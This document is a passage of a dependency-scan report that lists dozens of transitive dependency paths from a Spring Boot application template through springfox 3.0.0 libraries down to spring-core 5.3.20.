  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
